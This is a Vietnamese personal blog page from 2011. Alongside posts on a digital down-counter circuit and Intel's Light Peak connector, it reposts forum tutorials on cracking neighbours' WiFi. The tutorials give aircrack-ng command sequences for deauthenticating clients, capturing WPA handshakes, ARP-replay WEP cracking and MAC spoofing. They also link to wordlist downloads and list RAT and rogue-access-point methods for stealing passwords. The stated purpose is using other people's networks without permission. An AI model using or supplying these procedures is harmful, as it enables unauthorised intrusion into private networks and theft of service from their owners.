This is my blog: vuvanson.tk

Go to Blogger Vi-et Spaces.

This is my blog: sonblog.tk

Go to Blogger Vi-et Spaces.

This is my blog: vi-et.tk

Go to Blogger Vi-et Spaces.

This is my facebook: https://www.facebook.com/vusonbk

Go to Facebook Blogger Vi-et Spaces.

This is my facebook page: https://www.facebook.com/ViEtSpaces

Go to Facebook Page Blogger Vi-et Spaces.

Thứ Bảy, 26 tháng 2, 2011

Mạch đếm lui (Nghịch) từ 99 xuống 00

Khi học môn điện tử số chúng ta thấy các con IC số giúp chúng ta thiết kế mạch khá là đơn giản và nhanh chóng. Các IC đếm, IC giải mã, IC mã hóa, IC logic... Các IC này giúp chúng ta tạo được mạch điện tử theo mục đích của chúng ta. Khi học xong môn điện tử số thì chúng ta ứng dụng những con IC này vào các bài toán đơn giản để chúng ta hiểu được IC số thế nào. Hôm nay biendt sẽ hướng dẫn các pác làm bài toán đơn giản là " Thiết kế bộ đếm lùi (nghịch) từ 99 về 00" Để cho chúng ta hiểu được các IC số nghép nối như thế nào để được mạch đếm theo yêu cầu của bài toán





Nói đến bài toán đếm chúng ta nghĩ ngay đến việc là đếm xung. Các IC số sẽ đếm sườn lên hay sườn xuống của xung đầu vào cần đếm ( Đếm ở đây là đếm xung vuông) mỗi giá trị sườn lên hay sườn xuống của xung được đưa vào IC đếm và được mã hóa ra BCD hay là mã hóa ra cái khác. Từ cái đã mã hóa ra BCD ta sẽ dùng IC giải mã BCD ra mã khác để hiện thị. Đếm lùi nó cũng tương tự như đếm lên khác là giá trị đếm được đếm từ cao xuống thấp.
Mạch đếm biendt trình bày có 3 mảng chính :


1) Phần tạo xung đếm

Thứ Sáu, 25 tháng 2, 2011

Lab Hack Password Wireless WPA hidden SSID (Document + Video)

Lab Hack Password Wireless WPA hidden SSID (Document + Video) 




"BACKTRACK" CÔNG CỤ HACK WIFI

Gần nhà bạn đang có sóng wifi của láng giềng (quán cafe, khách sạn,...hay chỉ là nhà hàng xom bên cạnh thôi) nhưng bạn không sử dụng được vì có password.
Xin giới thiệu với các bạn phần mền phá password sóng wifi. 


Download BACKTRACK 4


Tài liệu BACKTRACK 4



VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2




 lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down

còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi



Code:

http://packetstormsecurity.org/Crackers/wordlists/utilities



NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM HACK KHÁC

THAM KHẢO TẠI :


1.Chuẩn bị :
1.1.Phần cứng :
_ 1 AP có hỗ trợ bảo mật WPA
_ 1 PC có wireless card -> Client
_ 1 PC có wireless card có hỗ trợ monitor (xem tại đây http://www.aircrack-ng.org/doku.php?id=compatible_cards) -> Attacker 
1.2.Phần mềm :
PC của Attacker : 
_ Cài HĐH Linux (ở đây sẽ là BackTrack 4)
_ Aircrack-ng
_ 1 file từ điển chứa các từ khóa có khả năng là password , hoặc 1 pre-computed database (dùng airolib-ng để tạo)


2.Hack WPA :
2.1.Các bước cơ bản :
_ Bước 1 : chuyển wireless card về chế độ monitor
_ Bước 2 : scan mạng wireless và bắt dữ liệu từ AP target
_ Bước 3 : bắt 4-way handshake 
_ Bước 4 : dùng aircrack-ng + file từ điển (hoặc pre-computed database) để dò password
2.2.Thực hiện :
2.2.1.Bước 1 :
Xem các interface của card mạng :



Trường hợp này wireless card có interface là wlan0



Chuyển wlan0 về chế độ Monitor



airmon-ng sẽ tạo ra card mạng ảo dùng cho việc Monitor tên là mon0

2.2.2.Bước 2:
Scan mạng wireless trong “vùng bắt sóng” của wireless card



Ở đây ta có 1 AP có BSSID là 00

d4: 68 :d2:08 , channel 7 , bảo mật WPA2 , mã hóa kiểu CCMP , chứng thực PSK , cột ESSID ghi là  tức là AP ẩn , 
và có 1 client 00

e8:be:e9:c5 đang connect






Ta sẽ bắt dữ liệu từ AP ẩn có BSSID 00

d4: 68: d2:08 trên channel 7 và ghi vào file wpa2.cap






2.2.3.Bước 3 : 
Trong cơ chế bảo mật WPA , khi muốn kết nối với AP , client sẽ gởi gói tin có chứa 4-way handshake đến đến AP , trong gói tin đó có chứa thông tin về password (đã được hash) của mạng WPA . Ta phải được gói tin có chứa 4-way handshake thì mới có thể tìm ra được password. 
Để làm được điều này , ta phải “đá” client ra :






aireplay-ng -0 1 : deauthenticate 1 lần
-a 00

d4: 68 :d2:08 : setAccess Point MAC address
-c 00

 44 :7b:f9:bc : set Destination MAC address
mon0 : interface ảo của wireless card dùng cho việc monitor
=> lệnh này có nghĩa là : mon0 sẽ giả danh AP 00

d4: 68 :d2:08 và gởi đến client 00

44 :7b:f9:bc thông tin rằng “anh đã bị đá ra khỏi mạng” , client sẽ phải gởi gói tin chứa 4-way handshake yêu cầu kết nối lại với AP. Lúc này lệnh airodump-ng ở trên sẽ bắt được gói tin chứa 4-way handshake , và cũng sẽ dò ra được SSID của AP .
(quay lại cửa sổ airodump-ng)



Bước 4 : 
Công việc cần làm bây giờ là phải dò ra password từ gói dữ liệu chứa 4-way handshake mà ta bắt được (đã lưu vào file .cap)



Ta chỉ quan tâm đến 3 file :
_ database : file pre-computed database , chứa các từ khóa đã được hash (ở dạng binary) cho phù hợp với các SSID cụ thể (xem Video hướng dẫn tạo database)
_ dic : file từ điển , chứa các từ khóa (ở dạng text) có thể là password của AP
_ wpa2-01.cap : file chứa 4-way handshake , được tạo ra bởi lệnh airodump-ng ở bước 2 + 3
Người viết đã có :
+ file từ điển dung lượng ~ 40MB chưa ~ 3 triệu từ khóa
+ file database được tạo nên từ file từ điển trên , tương thích với SSID là default

Bắt đầu dùng aircrack-ng kết hợp với file từ điển đề dò password bắt được trong file .cap :






Như ta thấy , nếu chỉ dùng file từ điển thô thì tốc độ dò chỉ khoảng 400 từ trên 1 giây -> muốn dò được hết file từ điển 3 triệu từ thì mất khoảng 7500 giây ~ 2 giờ 5 phút

Để rút ngắn thời gian thì ta sẽ dùng aircrack-ng kết hợp với database :






Tốc độ đạt được gần 40K từ trên 1 giây -> 3 triệu từ mất hơn 1 phút !!!



Sau 1 phút 19 giây thì đã dò ra được password 



LƯU Ý 
1. Tùy vào cấu trúc phần cứng mà có thể gặp các trường hợp sau :
+ interface của card wireless là ATH hoặc WLAN hoặc WIFI
+ interface ảo mon0 có thể có hoặc không (nếu ko có thì dùng interface mặc định ban đầu)
+ nếu không chuyển về chế độ monitor bằng lệnh airmon-ng thì có thể dùng lệnh sau :
# iwconfig < interface> mode Monitor

2. Bắt buộc phải có ít nhất 1 client “đang hoạt động” và “trong tầm bắt sóng” của wireless card
(trên mạng có nói về kỹ thuật Korek và Fragment có thể hack WEP mà không cần Client , nhưng người thực hiện lab đã test nhiều lần mà vẫn không thành công, có thể là do kỹ thuật này không còn dùng được với các AP sau này)

3. Nên dùng hệ điều hành BackTrack , vì nó đã tích hợp đủ “đồ nghề” cần thiết . Có thể chạy nó trên Live CD , USB , hoặc trên máy ảo

4. Hack WPA nào cũng dùng cách tương tự như nhau

5. Hack WEP thì tỉ lệ thành công là 100% , nhưng hack WPA thì không được như vậy . Aircrack-ng không có cơ chế tự tổ hợp những từ khóa , ký tự (vét cạn) mà chỉ có thể so sánh các từ khóa có trong file từ điển (hoặc database) với password đã được hash, có nghĩa làtrong file từ điển (hoặc database) phải có chính xác từ khóa trùng với password

Video 

Code:
http://www.youtube.com/watch?v=hqL2efcUoVc


Hướng dẫn tạo pre-computed database (cái clip làm database này của người ta , để hôm nào rãnh làm lại cái clip này)
Code:
http://www.youtube.com/watch?v=9L_Xh3nLwLw


Crack Wifi trong vài phút

 

Việc các attacker có thể xâm nhập vào các mạng wifi của tổ chức, thông qua việc crack khóa mã hóa truy cập vào wifi access point.

Cho dù các công nghệ mã hóa mạng không dây hiện nay là rất mạnh như Wired Equivalent Privacy (WEP) và Wi-Fi Protected Access (WPA và WPA-2)... 

Nhưng với những chương trình và thiết bị chuyên dụng, attacker có thể thực hiện thành công ý định của mình. Dưới đây là một trong những demo sử dụng AirPcap (USB 2.0 Wireless Capture Adapter – card bắt tín hiệu wifi) và chương trình Cain & Abel, một công cụ chuyên dụng để bắt gói trên mạng kể Wired hay wireless, sau đó tiến hành crack password, với nhiều phương thức khác nhau. Tất cả các setup được tiến hành trên Windows.

Chuẩn bị: 

1. Card AirPcapTx 

AirPcap là một trong những thiệt bị chuyên dùng để bắt và phân tích các tín hiệu của mạng không dây (của hãng Cace Technologies) theo các chuẩn hiện nay WLAN (802.11b/g). Thông thường Cace cung cấp bộ công cụ tích hợp bao gồm card AirPcap, và tool bắt gói tin như Wireshark (tênmới của công cụ Ethereal nổi tiếng).

Thông qua card AirPcap (dò và bắt tín hiệu wifi, sóng radio) Wireshark tiến hành phân tích các thông tin thu thập được về wifi Protocols và các tín hiệu radio.

Trong demo này, không sử dụng Wireshark, việc thu thập, phân tích và giải mã các khóa mã hóa, thu được từ tín hiệu wifi, tiến hành thông qua một tool khác cũng cực mạnh là: Cain and Abel 

Tiến hành cài Airpcap drivers kèm theo CD, sau khi setup driver xong, gắn Airpcap adapter vào USB slot. 

Chú ý: Tín hiệu thu phát của Wireless card hoặc Airpcap bao giờ cũng yếu hơn Access point. Đặt laptop gắn Airpcap, càng gần khu vực Wifi Access point phát sóng bao nhiêu, tín hiệu gửi và nhận với Access point càng “rõ nét”...


2. Chương trình Cain and Abel 

Có lẽ người dùng UNIX rất buồn vì một công cụ mạnh và miễn phí như Cain and Abel lại chỉ chạy trên nền Windows. Một công cụ chuyên bắt gói tin và crack các password đã mã hóa. Sử dụng các phương thức tấn công khá phổ biến để crack pass, bao gồm: Dictionary attack, Brute-Force và Cryptanalysis…

Download Cain & Abel v4.9.23 for Windows NT/2000/XP

Một Wifi Access point đã được phát hiện kèm theo MAC add và SSID của nó 

Lưu ý: 

Trước khi tiến hành bơm vào thông số ARP giả mạo (ARP injections/ARP spoofing), AirPcap sẽ phải tiến hành bắt được ít nhất một ARP request (để tìm MAC address thật) của bất kì wireless Client nào đang connect vào access point (wireless card của attacker hoặc các Clients hợp pháp khác..) đang kết nối với Wifi access point. Sau khi bắt ARP request, Cain & Abel sẽ tiến hành gửi một ARP request giả mạo (với MAC address vừa có được), và thiết lập duy trì với Wifi Access point trong suốt quá trình Access Point “nhả” IVs packets. Nếu vì bất kì lí do nào đó MAC address của Client không duy trì kết nối với Access point, thì Access Point sẽ gửi một thông điệp từ chối “DeAuthentication” và các gói IVs sẽ không được tiếp tục cung cấp. 

Phải đảm bảo thu thập được trên 250,000 IVs (Initialization Vectors, số lượng các packet đồng bộ giữa AirPcap/Clients và wifi access point, thì Cain and Abel mới có thể tiến hành crack WEP key. Thông thường, không một ai đủ kiên nhẫn ngồi chờ IVs được kích hoạt đủ số lượng, cho nên hầu hết các Wep Crack tool hiện nay (Cain & Abel, Aircrack-ng, Aircrack-PTW, đều áp dụng kĩ thuật Packet Injection (hoặc deauth & ARP re-injection, thông qua các ARP request). Injection tác động làm Wifi Access Point, phải gửi lại các packet đã được lựa chọn, một cách nhanh hơn, khiến trong thời gian ngắn đã có đủ số lượng IVs cần thiết. 

Với kĩ thuật deauth & ARP re-injection, công cụ Aircrack-PTW, chỉ cần khoảng 85.000 packets đã có thể giải mã được Web key 128 bits, tỉ lệ thành công trên 95%. (đây là tool của trung tâm nghiên cứu mã hóa và máy tính của ĐH Kĩ Thuật DarmStadt Đức- www.darmstadt.de).

Aircrack-PTW, chỉ cần khoảng 85.000 IVs để giải mã WEP 128 bits 

Nếu không dùng Packet Injection, số lượng packet phải thu thập được trước khi crack Wep Key, khoảng 500.000 để giải mã Wep key 64 bits và có thể lên đến 2.000.000 cho giải mã Wep key 128 bits. Chắc chắn rằng, thời gian chờ đủ IVs, cho đến khi có thể tiến hành crack Wep key, là..mệt mỏi ! 

Nếu phân tích về lý thuyết thì rất nhiều thứ còn phải đề cập, vì bạn phải hiểu về cấu trúc TCP/IP, Networking, Raw Socket, Packet header Injection, các chuẩn mã hóa Wireless như WEP hay WPA, WPA-2… Nếu cần phải hiểu rõ quy trình Sniff & crack wep-key, thì bạn nên dùng một công cụ, sử dụng command để đi từ đầu đến cuối, ví dụ như Aircrack-ng hoặc Aircrack-PTW, như đã giới thiệu ở trên.

Ở các công cụ này, việc dò tìm được tiến hành từng bước:

- Detect Access point (tìm được MAC address Access point, SSID name..)
- Send MAC address giả mạo, để tạo và duy trì kết nối với Access point (fake MAC)
- Thu thập Wep IVs packets, càng nhiều càng tốt (Wep 128 bits, phải trên 250.000 packets)
- Và cuối cùng là chạy chương trình để crack capture file, tìm wep key.

Nhưng tóm lại, với Aircap adapter đã setup kèm theo Driver và Cain & Abel, thì bạn mất không quá 10’ để crack Wep key (128 bits). 

Công việc chính của bạn, là chỉ nhìn vào giao diện đang vận hành của Cain & Abel, theo dõi số lượng Unique WEP IVs packets, đạt ngưỡng trên 250.000 packets. Sau đó đó nhấn nút giải mã với Korek’s Wep hay PTW attack.


 
NOTE---WPA,WPA2


Hi,
Tôi hay lang thang thấy các diễn đàn có nhiều người hỏi về crack passwork wirless để xài chùa, và có rất nhiều bài hướng dẫn làm điều đó, chủ yếu dùng aircrack trên *nix và Abel & Cain trên Windows hoặc BACKTRACK. Bản thân thôi chỉ mới thử dùng aircrack trên Ubuntu để thử dò cái pass của nhà bên cạnh và lên cơ quan dò thử (cả 2 đều dùng WPA). Kết quả đều là con số 0. Sau đó tôi nhận ra rằng để dò được pass thì trong dictionary phải có cái pass đó thì mới có cơ may. Mà ở VN thường có kiểu đặt pass theo kiểu nói trại đi, biến từ biến ngữ, ví dụ như là :
- kute, cut3, kut3 (cute)
- 9girls, nic3girls (nice girls)
- d0g (dog)
- ...
Với kiểu nói và viết như vậy và khi đặt pass cũng đặt như vậy thì tôi dám khẳng định việc crack pass WPA là không thể. Tôi đã từng thử với bộ từ điển search được trên mạng có size là 10 Mb (file text mà 10 Mb thì thử hình dung nó chứa bao nhiêu từ ) mà cũng không dò được pass. Bên cạnh đó với kiểu đặt theo strong password có chữ số, ký tự đặc biệt, vd :
- emkut3@^_^
- |-|3L0 |-|@c|<3r (Hello hacker)
- ..
Thì tôi dám chắc chắn việc crack password WPA là chuyện viễn vông nếu mong muốn ra ngay kết quả ! Hoặc phải có 1 nhóm tập trung các passwork "made in VN" thì mới đáp ứng được.
Vậy các bạn vui lòng cho biết, trong các bạn ai đã từng crack được pass wireless WPA và pass là gì ?
Hy vọng bài viết này sẽ dập tắt được mơ tưởng về việc crack pass wireless WPA của đa số người khi xem các bài tut, các video demo việc crack thấy ngon lành lắm, nhưng không để ý là đã số pass trong các bài tut đó đều rất đơn giản như là 123456, 123456789...

Thân

P/S :
Chỉ nên hack pass wifi [wep] thành công 100% 



 

Thứ Năm, 24 tháng 2, 2011

Công nghệ truyền tải tốc độ cao Light Peak của Intel

USB 3.0 sẽ là tương lai gần của chuẩn kết nối trên máy tính và có vẻ như tương lai xa hơn là đây. Light Peak là chuẩn kiết nối quang với tốc độ lên đến 10Gbps (USB 3.0 tối da là 4,8Gbps, USB 2.0 là 0,48Gbps) vừa được Intel giới thiệu tại IDF thực sự là kết nối trong mơ của kỷ nguyên HD. 

Không chỉ nhanh hơn Light Peak còn đảm bảo tốc độ này trên đường truyền dài hơn, lên đến 100m. Chúng ta có thể thoải mái truyền dữ liệu chất lượng cao qua lại giữa máy tính với màn hình, mạng, ổ cứng gắn ngoài... Cứ so với tốc độ hiện thực hóa của USB 3.0 (từ 2007) thì ta có lẽ sẽ không thấy Light Peak trong nay mai. Chuẩn kết nối phổ biến hiện nay là USB 2.0 rồi Firewire 400 và Firewire 800.

Hôm 7/1/2011, một viên chức điều hành của Intel cho biết, công nghệ kết nối Light Peak của hãng, được thiết kế để kết nối máy tính với những thiết bị như màn hình và bộ lưu trữ ngoài, đã sẵn sàng để áp dụng.





Công nghệ Light Peak, được công bố vào năm 2009, nguyên thủy được thiết kế dùng cáp quang để truyền dữ liệu giữa máy tính và các thiết bị, nhưng các phiên bản đầu sẽ được làm bằng đồng - David Perlmutter, Phó chủ tịch điều hành kiêm Tổng giám đốc Architecture Group của Intel cho biết trong cuộc phỏng vấn tại Triển lãm Hàng Điện tử Tiêu dùng CES (Consumer Electronics Show) 2011 tổ chức tại Las Vegas (Mỹ). 

Ông Perlmutter cho biết, phiên bản bằng đồng hoạt động rất tốt, tốt hơn họ nghĩ. Cáp quang luôn là một công nghệ mới nhưng đắt tiền hơn.

Ông Perlmutter không cho biết khi nào các thiết bị dùng Light Peak được “lên kệ”, ông chỉ cho biết ngày xuất xưởng còn tùy thuộc vào các hãng sản xuất thiết bị. Trước đây Intel cho biết, thiết bị dùng công nghệ Light Peak sẽ được xuất xưởng vào cuối năm 2010 hay đầu năm nay.

Đối với đa số nhu cầu người dùng hiện nay, chất liệu đồng đã là tốt, theo ông Perlmutter, nhưng dữ liệu được truyền nhanh hơn nhiều qua cáp quang, ngày càng được dùng nhiều trong các thiết bị áp dụng công nghệ Light Peak.

Intel cho biết, công nghệ Light Peak sẽ dùng cáp quang để tăng tốc độ truyền dữ liệu giữa các thiết bị di động và các sản phẩm gồm thiết bị lưu trữ, kết nối mạng và âm thanh. Dữ liệu sẽ được truyền với băng thông từ 10 gigabit mỗi phút trở lên trong khoảng cách đến 100 mét. Nhưng với dây đồng, tốc độ và cự ly truyền dữ liệu sẽ không được cao.

Hiện nay, máy tính được nối với các thiết bị ngoại vi bằng kết nối USB, nhưng ông Perlmutter không cho biết liệu công nghệ Light Peak cuối cùng có thay thế được các công nghệ đó không. Theo ông Perlmutter, USB 3.0 đang hút khách trên thị trường; ông không biết sẽ có thay đổi hay không. Có thể chuẩn hiển thị và nối mạng dùng Light Peak sẽ cùng được sử dụng với USB.

Ông Perlmutter đề nghị hãy xem công nghệ Light Peak là một phương tiện để làm việc, chứ không nhất thiết là để thay thế công nghệ khác.


Thứ Tư, 23 tháng 2, 2011

Phá pass WIFI (WEP KEY) thành công 100%

Xin thưa các anh em , hiện tại có 4 cách hack WPA+WPA2 mà dân hacker dang dùng

List of methods:

1. Dictionary attack (sử dụng Dictionary dể tra pass hay còn gọi là sổ số kiến thiết ,hên xui 


)

2. Bruteforce attack (cách này thì perfect ,pass cỡ nào tra cũng ra => thời gian tìm ra pass thì lâu vô cùng ,tùy vào dộ dài hay dộ khó của pass)

3. RAT+Wirelesskeyview combo attack(cách này thì tựa như là cài Keylogger vào máy victim ,mà con RAT này lợi hại hơn KeyLog ở chỗ là mình có thể điều khiển máy victim => lấy cắp pass rất dễ) . Cách này mà bị police bắt thì truy ra 2 tội (a.dột nhập máy trái phép / b.ăn cắp WIFI trái phép 


 )

4. Rogue AP attack (cách này nghe tụi hacker bảo là khả thi nhất và dễ lấy pass nhất .Nhưng cách này dòi hỏi phải có kiến thức nhiều về mạng ,vì cách thức hoạt dộng là tạo một AP giả mạo ,sau đó Victim kết nối vào và nó require password again ,sau khi victim type vào thì pass sẽ chuyển về cho mình.) 



TIN VUI CHO CÁC ANH EM ^^!

Hai nhà khoa học máy tính đến từ trường đại học Toshihiro Ohigashi và Masakatu Morii (Nhật Bản) cho biết, họ có thể bẻ khóa hệ thống mã hóa bảo vệ để truy cập trái phép vào mạng Wi-fi (WPA) trong các bộ định tuyến không dây, và qua trình này chỉ mất có 1 phút.





Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.

Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.

Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.

Theo VnMedia (PC World)

 

Bạn tải ewr 2.4.3 về dò thử xem,nhớ cài driver cài wireless trong đó có sẳn mới dò được
http://www.mediafire.com/?sharekey=5...db6fb9a8902bda

"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI

 

backtrack 4,100% dò dc pass WEP nếu chip wifi hỗ trợ 


danh sách chip hỗ trợ http://www.aircrack-ng.org/doku.php?...bility_drivers

DÙNG CHO MỌI HỆ ĐIỀU HÀNH

bước 1 downnload BACKTRACK 4 beta

KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD

http://www.backtrack-linux.org/downloads/





bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó

mediafire



CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN

LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU


1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu

CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng

mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}

thế là đã có wep key -->mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)

lượng DATA tối thiểu nên chờ là 40 000 nha các bạn

CHANGE mac NẾU CẦN THIẾT

change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...

và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun


bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4
những hardware hông hỗ trợ trên BT4


vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search

ĐÂY LÀ ĐOẠN CLIP MANG TÍNH THAM KHẢO VÀ CÓ THỂ KHÁC TÀI LIỆU (ko đáng kể ^^!) 

[/QUOTE]


+nê1u ai ko hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ ko chịu trách nhiệm khi các bạn được police mời đi uống trà đá )

1 VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2



Code:

http://websecurity.ro/downloads/dictionary.tar.gz


18M



Code:

http://upload.gibbocool.com/files/28GBwordlist.rar


74MB



Code:

http://rapidshare.com/files/98295454/huge_wordlist.rar


78MB

lưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down

còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi



Code:

http://packetstormsecurity.org/Crackers/wordlists/utilities


NGOÀI RA CÒN CÓ THÊM HÀNG CHUC PHẦN MỀM HACK KHÁC

THAM KHẢO TẠI :


NHỚ THANKS MÌNH NHÁ , ^^! 



NOTE---WPA,WPA2

Hi,

Tôi hay lang thang thấy các diễn đàn có nhiều người hỏi về crack passwork wirless để xài chùa, và có rất nhiều bài hướng dẫn làm điều đó, chủ yếu dùng aircrack trên *nix và Abel & Cain trên Windows hoặc BACKTRACK. Bản thân thôi chỉ mới thử dùng aircrack trên Ubuntu để thử dò cái pass của nhà bên cạnh và lên cơ quan dò thử (cả 2 đều dùng WPA). Kết quả đều là con số 0. Sau đó tôi nhận ra rằng để dò được pass thì trong dictionary phải có cái pass đó thì mới có cơ may. Mà ở VN thường có kiểu đặt pass theo kiểu nói trại đi, biến từ biến ngữ, ví dụ như là :

- kute, cut3, kut3 (cute)
- 9girls, nic3girls (nice girls)
- d0g (dog)
- ...

Với kiểu nói và viết như vậy và khi đặt pass cũng đặt như vậy thì tôi dám khẳng định việc crack pass WPA là không thể. Tôi đã từng thử với bộ từ điển search được trên mạng có size là 10 Mb (file text mà 10 Mb thì thử hình dung nó chứa bao nhiêu từ ) mà cũng không dò được pass. Bên cạnh đó với kiểu đặt theo strong password có chữ số, ký tự đặc biệt, vd :

- emkut3@^_^
- |-|3L0 |-|@c|<3r (Hello hacker)
- ..

Thì tôi dám chắc chắn việc crack password WPA là chuyện viễn vông nếu mong muốn ra ngay kết quả ! Hoặc phải có 1 nhóm tập trung các passwork "made in VN" thì mới đáp ứng được.

Vậy các bạn vui lòng cho biết, trong các bạn ai đã từng crack được pass wireless WPA và pass là gì ?

Hy vọng bài viết này sẽ dập tắt được mơ tưởng về việc crack pass wireless WPA của đa số người khi xem các bài tut, các video demo việc crack thấy ngon lành lắm, nhưng không để ý là đã số pass trong các bài tut đó đều rất đơn giản như là 123456, 123456789...

Thân

---------------------------------------------------------------------------------------------

NHỮNG BÀI ĐƯỢC LƯU Ý





 


Trích

 nggianglx 
View Post


mình có 1 tử điển được tích hợp các cách đặt password của người việt... nhưng dung lượng của nó thì khiếm đảm.... 25GB.... chẳng biết chép vào đâu cho vừa, làm sao up lên cho anh em cùng thử. Từ điển này là do 1 giáo viên ở trung tâm an ninh mạng Athena viết trước khi ông ấy sang USA làm việc và định cư. Đây có lẽ là tài liệu duy nhất và độc nhất ở VN

Mình thấy BT rất tốt đấy bạn àh. nó là bộ công cụ dùng để Pentest hệ thống tốt nhất hiện nay đó. Nó tích hợp rất nhiều công cụ để bạn kiểm tra mức độ an ninh của hệ thống mạng của bạn. Mình có bộ tài liệu nghiên cứu nó, bạn có thể tham khảo trang web

http://www.offensive-security.com

Bí kiếp Offensive Security 101

Part 1: http://www.mediafire.com/?mmggbbdm9me
Part 2: http://www.mediafire.com/?ded2ds5pjdm
Part 3: http://www.mediafire.com/?25bmesrdmyz
part 4: http://www.mediafire.com/?jtx1ubcll9m

Pass Unrar: www.itlab.com.vn

Mình cũng tìm được từ Itlab thôi











 


Trích

 namquang1233 
View Post


mình có ct đơn giản hơn nhiều chạy trên windows cả xp lẩn vista chỉ có cái nó tiếng đức nếu muốn sử dụng phải mài mò 1 chút với nó kén card wifi đây là list card nó support
Supported Adapters
802.11bgn and 802.11abgn Adapters

Atheros Wireless Network Adapter (AR5008)
D-Link DWA-542 RangeBooster N Desktop Adapter
D-Link DWA-547 RangeBooster N Desktop Adapter
D-Link DWA-552 Xtreme N Desktop Adapter
D-Link DWA-556 Xtreme N PCI Express Desktop Adapter
D-Link DWA-642 RangeBooster N Notebook Adapter
D-Link DWA-643 Xtreme N Notebook ExpressCard Adapter
D-Link DWA-645 RangeBooster N 650 Notebook Adapter
D-Link DWA-652 Xtreme N Notebook Adapter
Gigabyte GN-WI03N (mini) PCI WLAN Card
Gigabyte GN-WI06N (mini) PCI Express WLAN Card
Gigabyte GN-WM02N Express WLAN Card
Gigabyte GN-WP02N PCI Express WLAN Card
NEC AtermWL300NC (PA-WL300NC) Wireless Network Adapter
TP-Link TL-WN910N Wireless N Cardbus Adapter
CACE Technologies AirPcap Nx USB Adapter 

802.11bg and 802.11abg Adapters

3Com OfficeConnect Wireless abg PC Card (3CRWE154A72)
Atheros Wireless Network Adapter (AR5001 through AR5007)
Cisco Aironet 802.11abg Wireless Cardbus Adapter
D-Link WNA-2330 RangeBooster G Notebook Adapter
D-Link AirPremier DWL-G680 Wireless Cardbus Adapter
D-Link AirPremier DWL-AG660 Wireless Cardbus Adapter
D-Link AirPremier DWL-AG530 Wireless PCI Adapter
D-Link AirXpert DWL-AG650 Wireless Cardbus Adapter
D-Link AirXpert DWL-AG520 Wireless PCI Adapter
D-Link AirPlus G DWL-G630 Wireless Cardbus Adapter (Rev. C, Rev. D)
D-Link AirPlus Xtreme G DWL-G520 Adapter
D-Link AirPlus Xtreme G DWL-G650 Adapter 
Gigabyte GN-WI01GT (mini) PCI-E WLAN Card
Gigabyte GN-WI01HT (mini) PCI WLAN Card
Gigabyte GN-WI07HT (mini) PCI-E WLAN Card
Gigabyte GN-WIAGGN-WPEAG (mini) PCI WLAN Card
Gigabyte GN-WIAH (mini) PCI WLAN Card
Gigabyte GN-WLMA102 Cardbus WLAN Card
Gigabyte GN-WM01GT Cardbus WLAN Card
Gigabyte GN-WMAG Cardbus WLAN Card
Gigabyte GN-WP01GT (mini) PCI WLAN Card
Intel PROWireless 2200BG Mini PCI Adapter 
Intel PROWireless 2915ABG Mini PCI Adapter 
